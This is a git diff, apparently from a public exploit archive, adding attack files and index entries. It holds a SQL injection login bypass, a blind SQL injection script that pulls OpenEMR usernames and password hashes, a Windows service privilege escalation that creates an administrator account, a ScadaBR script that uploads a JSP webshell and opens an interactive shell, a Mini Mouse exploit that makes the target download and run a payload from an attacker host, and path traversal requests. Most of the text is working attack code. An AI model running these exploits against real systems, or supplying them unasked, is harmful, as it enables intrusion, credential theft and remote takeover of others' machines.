+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://localhost/EdgeSketch/index.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=6b7072bb40c321cb336aacef057a0876
+Connection: close
+
+admin_username=%27+or+%271%27%3D%271%27%23&admin_password=random&admin_login=
\ No newline at end of file
diff --git a/exploits/php/webapps/49742.py b/exploits/php/webapps/49742.py
new file mode 100755
index 000000000..448a616f8
--- /dev/null
+++ b/exploits/php/webapps/49742.py
@@ -0,0 +1,75 @@
+# Exploit Title: OpenEMR 4.1.0 - 'u' SQL Injection
+# Date: 2021-04-03
+# Exploit Author: Michael Ikua
+# Vendor Homepage: https://www.open-emr.org/
+# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v4_1_0.zip
+# Version: 4.1.0
+# Original Advisory: https://www.netsparker.com/web-applications-advisories/sql-injection-vulnerability-in-openemr/
+
+#!/usr/bin/env python3
+
+import requests
+import string
+import sys
+
+print("""
+   ____                   ________  _______     __ __   ___ ____ 
+  / __ \____  ___  ____  / ____/  |/  / __ \   / // /  <  // __ \\
+ / / / / __ \/ _ \/ __ \/ __/ / /|_/ / /_/ /  / // /_  / // / / /
+/ /_/ / /_/ /  __/ / / / /___/ /  / / _, _/  /__  __/ / // /_/ / 
+\____/ .___/\___/_/ /_/_____/_/  /_/_/ |_|     /_/ (_)_(_)____/  
+    /_/
+    ____  ___           __   _____ ____    __    _               
+   / __ )/ (_)___  ____/ /  / ___// __ \  / /   (_)              
+  / /_/ / / / __ \/ __  /   \__ \/ / / / / /   / /               
+ / /_/ / / / / / / /_/ /   ___/ / /_/ / / /___/ /                
+/_____/_/_/_/ /_/\__,_/   /____/\___\_\/_____/_/   exploit by @ikuamike 
+""")
+
+all = string.printable
+# edit url to point to your openemr instance
+url = "http://192.168.56.106/openemr/interface/login/validateUser.php?u=" 
+
+def extract_users_num():
+    print("[+] Finding number of users...")
+    for n in range(1,100):
+        payload = '\'%2b(SELECT+if((select count(username) from users)=' + str(n) + ',sleep(3),1))%2b\''
+        r = requests.get(url+payload)
+        if r.elapsed.total_seconds() > 3:
+            user_length = n
+            break
+    print("[+] Found number of users: " + str(user_length))
+    return user_length
+
+def extract_users():
+    users = extract_users_num()
+    print("[+] Extracting username and password hash...")
+    output = []
+    for n in range(1,1000):
+        payload = '\'%2b(SELECT+if(length((select+group_concat(username,\':\',password)+from+users+limit+0,1))=' + str(n) + ',sleep(3),1))%2b\''
+        #print(payload)
+        r = requests.get(url+payload)
+        #print(r.request.url)
+        if r.elapsed.total_seconds() > 3:
+            length = n
+            break
+    for i in range(1,length+1):
+        for char in all:
+            payload = '\'%2b(SELECT+if(ascii(substr((select+group_concat(username,\':\',password)+from+users+limit+0,1),'+ str(i)+',1))='+str(ord(char))+',sleep(3),1))%2b\''
+            #print(payload)
+            r = requests.get(url+payload)
+            #print(r.request.url)
+            if r.elapsed.total_seconds() > 3:
+                output.append(char)
+                if char == ",":
+                    print("")
+                    continue
+                print(char, end='', flush=True)
+
+
+try:
+    extract_users()
+except KeyboardInterrupt:
+    print("")
+    print("[+] Exiting...")
+    sys.exit()
\ No newline at end of file
diff --git a/exploits/windows/local/49739.txt b/exploits/windows/local/49739.txt
new file mode 100644
index 000000000..1bd3688c5
--- /dev/null
+++ b/exploits/windows/local/49739.txt
@@ -0,0 +1,53 @@
+# Exploit Title: Rockstar Service - Insecure File Permissions
+# Date: 2020-04-02
+# Exploit Author: George Tsimpidas
+# Software Link : https://socialclub.rockstargames.com/rockstar-games-launcher
+# Version Patch: 1.0.37.349
+# Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362
+
+Vulnerability Description:
+
+RockstarService.exe  suffers from an elevation of privileges vulnerability which can be used by an "Authenticated User" to modify the existing executable file of the service with a binary of his choice. The vulnerability exist due to weak set of permissions being granted to the "Authenticated Users Group" which grants the (M) Flag aka "Modify Privilege"
+
+#PoC
+
+ D:\Launcher> icacls .\Launcher.exe
+
+.\Launcher.exe BUILTIN\Administrators:(I)(F)
+               NT AUTHORITY\SYSTEM:(I)(F)
+               NT AUTHORITY\Authenticated Users:(I)(M)
+               BUILTIN\Users:(I)(RX)
+
+#1. Create low privileged user & Login  to that user
+
+C:\>net user lowpriv Password123! /add
+C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"
+User name lowpriv
+Local Group Memberships *Users
+Global Group memberships *None
+
+#2. Move the RockstarService.exe to a new name
+
+D:\Launcher> move RockstarService.exe RockstarService.exe.bk
+1 file(s) moved.
+
+#3. Create malicious binary on kali linux with MSF
+
+msfvenom -f exe -p windows/exec CMD="net user placebo Password123! /add && net localgroup Administrators placebo /add" -o RockstarService.exe
+
+#4. Transfer created 'RockstarService.exe' to the Windows Host
+
+#5. Move the created 'RockstarService.exe' binary to the 'D:\Launcher' to replace the old one
+
+#6. Now start the Service
+
+Command : net start 'Rockstar Service'
+
+Now check out that the user has been registered to the system and added to the local group of Administrators
+
+C:\Users\lowpriv>net user placebo | findstr /i "Membership Name" | findstr
+/v "Full"
+
+User name placebo
+Local Group Memberships *Administrators *Users
+Global Group memberships *None
\ No newline at end of file
diff --git a/exploits/windows/webapps/49734.py b/exploits/windows/webapps/49734.py
new file mode 100755
index 000000000..289a44ac7
--- /dev/null
+++ b/exploits/windows/webapps/49734.py
@@ -0,0 +1,110 @@
+# Exploit Title: ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (1)
+# Date: 03/2021
+# Exploit Author: Fellipe Oliveira
+# Vendor Homepage: https://www.scadabr.com.br/ 
+# Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux
+# Tested on: Windows7, Windows10
+
+#!/usr/bin/python
+
+import requests,sys,time
+
+
+if len(sys.argv) <=4:
+    print('[x] Missing arguments ... ')
+    print('[>] Usage: python WinScada_RCE.py <TargetIp> <TargetPort> <User> <Password>')
+    print('[>] Example: python WinScada_RCE.py 192.168.1.24 8080 admin admin')
+    sys.exit(0)
+else:	
+    time.sleep(1)
+
+
+host = sys.argv[1]
+port = sys.argv[2]
+user = sys.argv[3]
+passw = sys.argv[4]
+
+flag = False
+LOGIN = 'http://'+host+':'+port+'/ScadaBR/login.htm'
+PROTECTED_PAGE = 'http://'+host+':'+port+'/ScadaBR/view_edit.shtm'
+
+
+banner = '''
++-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
+|    _________                  .___     ____________________       |
+|   /   _____/ ____ _____     __| _/____ \______   \______   \      |
+|   \_____  \_/ ___\\__  \   / __ |\__  \ |    |  _/|       _/       |
+|   /        \  \___ / __ \_/ /_/ | / __ \|    |   \|    |   \      |
+|  /_______  /\___  >____  /\____ |(____  /______  /|____|_  /      |
+|          \/     \/     \/      \/     \/       \/        \/       |
+|                                                                   |
+|    > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload |
+|    > Exploit Author : Fellipe Oliveira  			    |
+|    > Exploit for Windows Systems                                  |
++-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
+'''
+
+def main():
+    payload = {
+        'username': user,
+        'password': passw
+    }
+
+    print(banner)
+    time.sleep(2)
+   
+    with requests.session() as s:
+    	s.post(LOGIN, data=payload)
+	response = s.get(PROTECTED_PAGE)
+
+        print("[+] Trying to authenticate "+LOGIN+"...")
+	if response.status_code == 200:
+	    print("[+] Successfully authenticated! :D~\n")
+	    time.sleep(2)
+	else:
+	    print("[x] Authentication failed :(")
+            sys.exit(0)
+
+	burp0_url = "http://"+host+":"+port+"/ScadaBR/view_edit.shtm"
+	burp0_cookies = {"JSESSIONID": "66E47DFC053393AFF6C2D5A7C15A9439"}
+	burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------6150838712847095098536245849", "Origin": "http://"+host+":"+port+"/", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/view_edit.shtm", "Upgrade-Insecure-Requests": "1"}
+	burp0_data = "-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"view.name\"\r\n\r\n\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"view.xid\"\r\n\r\nGV_218627\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"backgroundImageMP\"; filename=\"win_cmd.jsp\"\r\nContent-Type: application/octet-stream\r\n\r\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%\n%>\n<HTML><BODY>\nCommands with JSP\n<FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\">\n<INPUT TYPE=\"text\" NAME=\"cmd\">\n<INPUT TYPE=\"submit\" VALUE=\"Send\">\n</FORM>\n<pre>\n<%\nif (request.getParameter(\"cmd\") != null) {\n    out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\n    Process p;\n    if ( System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n        p = Runtime.getRuntime().exec(\"cmd.exe /C \" + request.getParameter(\"cmd\"));\n    }\n    else{\n        p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n    }\n    OutputStream os = p.getOutputStream();\n    InputStream in = p.getInputStream();\n    DataInputStream dis = new DataInputStream(in);\n    String disr = dis.readLine();\n    while ( disr != null ) {\n    out.println(disr);\n    disr = dis.readLine();\n    }\n}\n%>\n</pre>\n</BODY></HTML>\n\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\nUpload image\r\n-----------------------------6150838712847095098536245849\r\nContent-Disposition: form-data; name=\"view.anonymousAccess\"\r\n\r\n0\r\n-----------------------------6150838712847095098536245849--\r\n"
+	getdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
+
+	print('[>] Attempting to upload .jsp Webshell...')
+	time.sleep(1)
+        print('[>] Verifying shell upload...\n')
+	time.sleep(2)
+	
+	if getdata.status_code == 200:
+	    print('[+] Upload Successfuly!')
+	    
+	    for num in range(1,500):	    
+	    	PATH = 'http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num)
+                find = s.get(PATH)
+
+                if find.status_code == 200:	
+                    print('[+] Webshell Found in: http://'+host+':'+port+'/ScadaBR/uploads/%d.jsp' % (num))
+		    flag = True
+                    print('[>] Spawning fake shell...') 
+                    time.sleep(3)                    
+
+	  	    while flag:
+                        param = raw_input("# ")
+	                burp0_url = "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?cmd=%s" % (num,param)
+                        burp0_cookies = {"JSESSIONID": "4FCC12402B8389A64905F4C8272A64B5"}
+                        burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://"+host+":"+port+"/ScadaBR/uploads/%d.jsp?cmd=%s", "Upgrade-Insecure-Requests": "1"}
+                        send = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)	
+         	        clean = send.text.replace('<pre>', '').replace('<FORM METHOD=', '').replace('<HTML><BODY>', '').replace('"GET" NAME="myform" ACTION="">', '').replace('Commands with JSP', '').replace('<INPUT TYPE="text" NAME="cmd">', '').replace('<INPUT TYPE="submit" VALUE="Send">', '').replace('</FORM>', '').replace('<BR>', '').replace('</pre>', '').replace('</BODY></HTML>', '')
+			print(clean)
+
+  	        elif num == 499:
+                    print('[x] Webshell not Found')
+                    
+	else:
+	    print('Reason:'+getdata.reason+' ')	   
+	    print('Exploit Failed x_x')
+
+
+if __name__ == '__main__':
+    main()
\ No newline at end of file
diff --git a/exploits/windows/webapps/49743.py b/exploits/windows/webapps/49743.py
new file mode 100755
index 000000000..5ee330f30
--- /dev/null
+++ b/exploits/windows/webapps/49743.py
@@ -0,0 +1,27 @@
+# Exploit Title: Mini Mouse 9.2.0 - Remote Code Execution
+# Author: gosh
+# Date: 01-04-2021
+# Vendor Homepage: http://yodinfo.com
+# Software Link: https://imgv.oss-cn-hangzhou.aliyuncs.com/minimouse.msi
+# Version: 9.2.0
+# Tested on: Windows 10 Pro build 19042.662
+
+#!/usr/bin/python3
+import requests
+import json
+import jsonargparse
+from time import sleep
+
+ip = input("target's ip:  ")
+lhost = input("local http server ip: ")
+name = input("payload file name: ")
+url = "http://{}:8039/op=command".format(ip)
+headers = {"Content-Type": "application/json", "Connection": "keep-alive", "Accept": "*/*", "User-Agent": "MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)", "Accept-Language": "en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8", "Accept-Encoding": "gzip, deflate"}
+down = {"command_operate_type": 0, "name": "abc", "script": f"certutil.exe -urlcache -split -f http://{lhost}/{name} C:\\Windows\\Temp\\{name}", "time": 0, "type": 100000}
+r = requests.post(url, headers=headers, json=down)
+print("[+] Retrieving payload")
+sleep(1)
+shell={"command_operate_type": 0, "name": "abd", "script": f"start /B C:\\Windows\\Temp\\{name}", "time": 0, "type": 100000}
+s = requests.post(url, headers=headers, json=shell)
+print (r.status_code)
+print ("[+] got shell!")
\ No newline at end of file
diff --git a/exploits/windows/webapps/49744.txt b/exploits/windows/webapps/49744.txt
new file mode 100644
index 000000000..bfb11f090
--- /dev/null
+++ b/exploits/windows/webapps/49744.txt
@@ -0,0 +1,172 @@
+# Exploit Title: Mini Mouse 9.2.0 - Path Traversal
+# Author: gosh
+# Date: 02-04-2021
+# Vendor Homepage: http://yodinfo.com
+# Software Link: https://imgv.oss-cn-hangzhou.aliyuncs.com/minimouse.msi
+# Version: 9.2.0
+# Tested on: Windows 10 Pro build 19042.662
+
+POC
+
+GET /file=C:%5CWindows%5Cwin.ini HTTP/1.1
+Host: 192.168.1.111:8039
+Content-Type: application/json
+Connection: keep-alive
+Accept: */*
+User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
+Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
+Content-Length: 0
+Accept-Encoding: gzip, deflate
+
+{}
+
+
+
+
+.......................................................
+
+HTTP/1.1 200 OK
+Server: bruce_wy/1.0.0
+Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
+Access-Control-Allow-Headers: Content-Type,Origin,Accept
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Credentials: true
+P3P: CP=CAO PSA OUR
+Content-Type: application/octet-stream
+Content-Range: bytes 0-0/92
+Content-Length : 92
+
+; for 16-bit app support
+[fonts]
+[extensions]
+[mci extensions]
+[files]
+[Mail]
+MAPI=1
+
+
+second POC:
+
+POST /op=get_file_list HTTP/1.1
+Host: 192.168.1.111:8039
+Content-Type: application/json
+Connection: keep-alive
+Accept: */*
+User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
+Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
+Content-Length: 28
+Accept-Encoding: gzip, deflate
+
+{"path":"C:\\Users\\Public"}
+
+
+
+.............................................................
+
+HTTP/1.1 200 OK
+Server: bruce_wy/1.0.0
+Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
+Access-Control-Allow-Headers: Content-Type,Origin,Accept
+Access-Control-Allow-Origin: *
+Access-Control-Allow-Credentials: true
+P3P: CP=CAO PSA OUR
+Content-Type: application/json
+Content-Range: bytes 0-0/-1
+
+{
+"ret_code": 1,
+"ret_msg": "success",
+"data": {
+"list": [{
+"path": "C:\\Users\\Public\\AccountPictures",
+"is_hide": true,
+"is_floder": true,
+"name": "AccountPictures",
+"name_display": "AccountPictures",
+"file_size": 0,
+"create_time": 1615677,
+"update_time": 1615737,
+"sys_type": 2
+}, {
+"path": "C:\\Users\\Public\\Desktop",
+"is_hide": true,
+"is_floder": true,
+"name": "Desktop",
+"name_display": "Desktop",
+"file_size": 0,
+"create_time": 1575713,
+"update_time": 1617276,
+"sys_type": 2
+}, {
+"path": "C:\\Users\\Public\\desktop.ini",
+"is_hide": true,
+"is_floder": false,
+"name": "desktop.ini",
+"name_display": "desktop",
+"file_size": 174,
+"create_time": 1575713,
+"update_time": 1575713,
+"sys_type": 2
+}, {
+"path": "C:\\Users\\Public\\Documents",
+"is_hide": false,
+"is_floder": true,
+"name": "Documents",
+"name_display": "Documents",
+"file_size": 0,
+"create_time": 1575713,
+"update_time": 1575713,
+"sys_type": 2
+}, {
+"path": "C:\\Users\\Public\\Downloads",
+"is_hide": false,
+"is_floder": true,
+"name": "Downloads",
+"name_display": "Downloads",
+"file_size": 0,
+"create_time": 1575713,
+"update_time": 1575713,
+"sys_type": 2
+}, {
+"path": "C:\\Users\\Public\\Libraries",
+"is_hide": true,
+"is_floder": true,
+"name": "Libraries",
+"name_display": "Libraries",
+"file_size": 0,
+"create_time": 1575713,
+"update_time": 1575714,
+"sys_type": 2
+}, {
+"path": "C:\\Users\\Public\\Music",
+"is_hide": false,
+"is_floder": true,
+"name": "Music",
+"name_display": "Music",
+"file_size": 0,
+"create_time": 1575713,
+"update_time": 1575713,
+"sys_type": 2
+}, {
+"path": "C:\\Users\\Public\\Pictures",
+"is_hide": false,
+"is_floder": true,
+"name": "Pictures",
+"name_display": "Pictures",
+"file_size": 0,
+"create_time": 1575713,
+"update_time": 1575713,
+"sys_type": 2
+}, {
+"path": "C:\\Users\\Public\\Videos",
+"is_hide": false,
+"is_floder": true,
+"name": "Videos",
+"name_display": "Videos",
+"file_size": 0,
+"create_time": 1575713,
+"update_time": 1575713,
+"sys_type": 2
+}]
+}
+}
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 613404ee3..ecf4932db 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6776,6 +6776,7 @@ id,file,description,date,author,type,platform,port
 49638,exploits/windows/dos/49638.py,"Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)",2021-03-11,"Enes Özeser",dos,windows,
 49685,exploits/hardware/dos/49685.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)",2021-03-19,LiquidWorm,dos,hardware,
 49697,exploits/multiple/dos/49697.py,"ProFTPD 1.3.7a - Remote Denial of Service",2021-03-22,xynmaps,dos,multiple,
+49730,exploits/hardware/dos/49730.py,"DD-WRT 45723 - UPNP Buffer Overflow (PoC)",2021-03-31,Enesdex,dos,hardware,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11309,6 +11310,7 @@ id,file,description,date,author,type,platform,port
 49703,exploits/windows/local/49703.txt,"ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path",2021-03-23,SamAlucard,local,windows,
 49704,exploits/windows/local/49704.txt,"Elodea Event Collector 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path",2021-03-23,"Alan Mondragon",local,windows,
 49706,exploits/windows/local/49706.txt,"Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path",2021-03-24,"Mohammed Alshehri",local,windows,
+49739,exploits/windows/local/49739.txt,"Rockstar Service - Insecure File Permissions",2021-04-05,"George Tsimpidas",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18434,6 +18436,8 @@ id,file,description,date,author,type,platform,port
 49682,exploits/hardware/remote/49682.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access",2021-03-19,LiquidWorm,remote,hardware,
 49695,exploits/hardware/remote/49695.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Weak Default WiFi Password Algorithm",2021-03-22,LiquidWorm,remote,hardware,
 49719,exploits/multiple/remote/49719.py,"vsftpd 3.0.3 - Remote Denial of Service",2021-03-29,xynmaps,remote,multiple,
+49745,exploits/multiple/remote/49745.js,"Google Chrome 86.0.4240 V8 - Remote Code Execution",2021-04-06,"Tobias Marcotto",remote,multiple,
+49746,exploits/multiple/remote/49746.js,"Google Chrome 81.0.4044 V8 - Remote Code Execution",2021-04-06,"Tobias Marcotto",remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -43639,6 +43643,7 @@ id,file,description,date,author,type,platform,port
 49308,exploits/hardware/webapps/49308.js,"Sony Playstation 4 (PS4) < 6.72 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",2020-11-12,Synacktiv,webapps,hardware,
 49309,exploits/hardware/webapps/49309.js,"Sony Playstation 4 (PS4) < 7.02 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",2020-12-16,ChendoChap,webapps,hardware,
 49310,exploits/php/webapps/49310.txt,"Victor CMS 1.0 - File Upload To RCE",2020-12-22,Mosaaed,webapps,php,
+49726,exploits/php/webapps/49726.py,"GetSimple CMS 3.3.16 - Reflected XSS to RCE",2021-03-30,boku,webapps,php,
 49312,exploits/php/webapps/49312.txt,"Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)",2020-12-22,"Matthew Aberegg",webapps,php,
 49314,exploits/php/webapps/49314.txt,"CSE Bookstore 1.0 - Multiple SQL Injection",2020-12-22,"Musyoka Ian",webapps,php,
 49315,exploits/php/webapps/49315.txt,"Library Management System 3.0 - _Add Category_ Stored XSS",2020-12-22,"Kislay Kumar",webapps,php,
@@ -43905,3 +43910,18 @@ id,file,description,date,author,type,platform,port
 49723,exploits/php/webapps/49723.txt,"Budget Management System 1.0 - 'Budget title' Stored XSS",2021-03-29,"Jitendra Kumar Tripathi",webapps,php,
 49724,exploits/java/webapps/49724.txt,"Novel Boutique House-plus 3.5.1 - Arbitrary File Download",2021-03-29,tuyiqiang,webapps,java,
 49725,exploits/windows/webapps/49725.py,"SyncBreeze 10.1.16 - XML Parsing Stack-based Buffer Overflow",2021-03-29,"Filipe Oliveira",webapps,windows,
+49727,exploits/multiple/webapps/49727.txt,"Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting",2021-03-30,cmOs,webapps,multiple,
+49729,exploits/php/webapps/49729.txt,"Zabbix 3.4.7 - Stored XSS",2021-03-31,"Radmil Gazizov",webapps,php,
+49731,exploits/multiple/webapps/49731.txt,"CourseMS 2.1 - 'name' Stored XSS",2021-03-31,cptsticky,webapps,multiple,
+49733,exploits/multiple/webapps/49733.txt,"Latrix 0.6.0 - 'txtaccesscode' SQL Injection",2021-04-01,cptsticky,webapps,multiple,
+49734,exploits/windows/webapps/49734.py,"ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (1)",2021-04-01,"Fellipe Oliveira",webapps,windows,
+49736,exploits/multiple/webapps/49736.txt,"phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)",2021-04-01,"Valerio Severini",webapps,multiple,
+49735,exploits/linux/webapps/49735.py,"ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (2)",2021-04-01,"Fellipe Oliveira",webapps,linux,
+49737,exploits/hardware/webapps/49737.txt,"ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation",2021-04-02,LiquidWorm,webapps,hardware,
+49738,exploits/hardware/webapps/49738.py,"F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated)",2021-04-02,Al1ex,webapps,hardware,
+49740,exploits/php/webapps/49740.txt,"Simple Food Website 1.0 - Authentication Bypass",2021-04-05,"Viren Saroha",webapps,php,
+49741,exploits/php/webapps/49741.txt,"Basic Shopping Cart 1.0 - Authentication Bypass",2021-04-05,"Viren Saroha",webapps,php,
+49742,exploits/php/webapps/49742.py,"OpenEMR 4.1.0 - 'u' SQL Injection",2021-04-05,"Michael Ikua",webapps,php,
+49743,exploits/windows/webapps/49743.py,"Mini Mouse 9.2.0 - Remote Code Execution",2021-04-05,gosh,webapps,windows,
+49744,exploits/windows/webapps/49744.txt,"Mini Mouse 9.2.0 - Path Traversal",2021-04-05,gosh,webapps,windows,
+49747,exploits/ios/webapps/49747.txt,"Mini Mouse 9.3.0 - Local File inclusion / Path Traversal",2021-04-06,gosh,webapps,ios,